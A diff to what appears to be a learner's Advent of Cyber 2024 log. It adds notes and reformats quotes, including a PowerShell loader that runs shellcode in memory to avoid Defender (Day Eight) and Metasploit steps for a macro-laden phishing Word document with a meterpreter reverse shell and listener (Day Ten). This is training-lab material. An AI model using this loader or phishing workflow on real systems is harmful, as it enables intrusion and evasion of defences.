--- a/AOC2024.md
+++ b/AOC2024.md
@@ -103,61 +103,84 @@ This day greeted me with a nice tool, JQ and it's QL! It's very useful for parsi
 
 For future reference:
 
-`jq -r '["Event_Time", "Event_Name", "User_Name", "Bucket_Name", "Key", "Source_IP"],(.Records[] | select(.eventSource == "s3.amazonaws.com" and .requestParameters.bucketName=="wareville-care4wares") | [.eventTime, .eventName, .userIdentity.userName // "N/A",.requestParameters.bucketName // "N/A", .requestParameters.key // "N/A", .sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'`
+> `jq -r '["Event_Time", "Event_Name", "User_Name", "Bucket_Name", "Key", "Source_IP"],(.Records[] | select(.eventSource == "s3.amazonaws.com" and .requestParameters.bucketName=="wareville-care4wares") | [.eventTime, .eventName, .userIdentity.userName // "N/A",.requestParameters.bucketName // "N/A", .requestParameters.key // "N/A", .sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'`
 
 ### DAY EIGHT ###
 
 Okay, it's getting fun! Today we learned about `msfvenom` that's used to create code to get reverse shell. We also got a bit of PowerShell code to execute it and run it without defender noticing because it was ran in ram. Pretty simple and straightforward yet again.
 
-```C#
-$VrtAlloc = @"
-using System;
-using System.Runtime.InteropServices;
-
-public class VrtAlloc{
-    [DllImport("kernel32")]
-    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);  
-}
-"@
-
-Add-Type $VrtAlloc 
-
-$WaitFor= @"
-using System;
-using System.Runtime.InteropServices;
-
-public class WaitFor{
- [DllImport("kernel32.dll", SetLastError=true)]
-    public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);   
-}
-"@
-
-Add-Type $WaitFor
-
-$CrtThread= @"
-using System;
-using System.Runtime.InteropServices;
-
-public class CrtThread{
- [DllImport("kernel32", CharSet=CharSet.Ansi)]
-    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
-  
-}
-"@
-Add-Type $CrtThread   
-
-[Byte[]] $buf = SHELLCODE_PLACEHOLDER
-[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
-[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
-$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
-[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")
-```
+>```C#
+>$VrtAlloc = @"
+>using System;
+>using System.Runtime.InteropServices;
+>
+>public class VrtAlloc{
+>    [DllImport("kernel32")]
+>    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);  
+>}
+>"@
+>
+>Add-Type $VrtAlloc 
+>
+>$WaitFor= @"
+>using System;
+>using System.Runtime.InteropServices;
+>
+>public class WaitFor{
+> [DllImport("kernel32.dll", SetLastError=true)]
+>    public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);   
+>}
+>"@
+>
+>Add-Type $WaitFor
+>
+>$CrtThread= @"
+>using System;
+>using System.Runtime.InteropServices;
+>
+>public class CrtThread{
+> [DllImport("kernel32", CharSet=CharSet.Ansi)]
+>    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+>  
+>}
+>"@
+>Add-Type $CrtThread   
+>
+>[Byte[]] $buf = SHELLCODE_PLACEHOLDER
+>[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
+>[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
+>$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
+>[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")
+>```
 
 ### DAY NINE ###
 
 Risk assesment. Easy day, just a bit of thinking and it's done. Not much to say, risk assessment is just that. Couple questions and answers. Depending on those we can identify risks and maybe mitigate them. Pobody's nerfect!
 
 ### DAY TEN ###
+
+Whoah! Tenth day already? Today we had to phish for some tasty reverse shell. So we had to prepare a payload using metasploit, they went nice and deep into how this and that works and whanot, all really nice and then we had to also use metasploit to listen for the reverse shell. We had a simulated mail exchange and after a short while a reverse shell was connected. Fun, not too complicated and fast *but* also very informative and gives me a basic understanding of tmetasploit. I can now explore around more confidently!
+
+>You will use the Metasploit Framework to create the document with the malicious macro. This requires the following commands:
+>
+>    Open a new terminal window and run msfconsole to start the Metasploit Framework
+>    set payload windows/meterpreter/reverse_tcp specifies the payload to use; in this case, it connects to the specified host and creates a reverse shell
+>    use exploit/multi/fileformat/office_word_macro specifies the exploit you want to use. Technically speaking, this is not an exploit; it is a module to create a document with a macro
+>    set LHOST CONNECTION_IP specifies the IP address of the attacker’s system, CONNECTION_IP in this case is the IP of the AttackBox
+>    set LPORT 8888 specifies the port number you are going to listen on for incoming connections on the AttackBox
+>    show options shows the configuration options to ensure that everything has been set properly, i.e., the IP address and port number in this example
+>    exploit generates a macro and embeds it in a document
+>    exit to quit and return to the terminal
+
+>We again will use the Metasploit Framework, but this time to listen for incoming connections when a target users opens our phishing Word document. This requires the following commands:
+>
+>    Open a new terminal window and run msfconsole to start the Metasploit Framework
+>    use multi/handler to handle incoming connections
+>    set payload windows/meterpreter/reverse_tcp to ensure that our payload works with the payload used when creating the malicious macro
+>    set LHOST CONNECTION_IP specifies the IP address of the attacker’s system and should be the same as the one used when creating the document
+>    set LPORT 8888 specifies the port number you are going to listen on and should be the same as the one used when creating the document
+>    show options to confirm the values of your options
+>    exploit starts listening for incoming connections to establish a reverse shell
 
 ### DAY ELEVEN ###
 
